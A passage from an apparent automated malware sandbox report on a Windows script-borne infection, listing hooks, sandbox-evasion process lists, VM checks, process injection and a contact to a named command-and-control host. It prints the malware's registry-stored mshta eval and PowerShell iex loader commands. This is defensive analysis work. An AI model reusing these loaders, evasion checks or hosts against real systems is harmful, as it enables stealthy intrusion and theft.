Source: Yara match File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\345678.vbs
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000001.00000003.572498942.0000017634237000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 3256 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380 Thread sleep time: -5534023222112862s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2968
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6236
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 21_2_05591802
Source: mshta.exe, 0000001E.00000003.636430270.0000014A8EE78000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\-
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.695253340.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}85-ab02-99bb52d3fb8b}\InstaB^
Source: explorer.exe, 00000025.00000000.714478354.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: 0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BU
Source: RuntimeBroker.exe, 00000027.00000000.747653122.000002413A440000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000015.00000003.621150182.00000000008E3000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-0E2F-4A16-A381-3E560C68BC8B
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bc
Source: explorer.exe, 00000025.00000000.712725595.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000025.00000000.715825967.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: rundll32.exe, 00000015.00000003.621150182.00000000008E3000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW,
Source: explorer.exe, 00000025.00000000.729862046.00000000053D7000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000025.00000000.715825967.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: mshta.exe, 0000001E.00000003.636522646.0000014A8EE47000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 21_2_05581577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 21_2_055714A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 21_2_05586E4E

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05585529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 21_2_05585529
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05592A09 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 21_2_05592A09

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.1.dr
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.0.cs
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 160000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 195D87A0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 9B851580
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF64DBB12E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 160000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF64DBB12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: ED6000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2AD0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 46DA8FD000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF616D15FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 195D87A0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF616D15FD0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: ED6000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 2AD0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 2896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 4612
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: explorer.exe, 00000025.00000000.681449997.0000000005EA0000.00000004.00000001.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000025.00000000.701018945.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
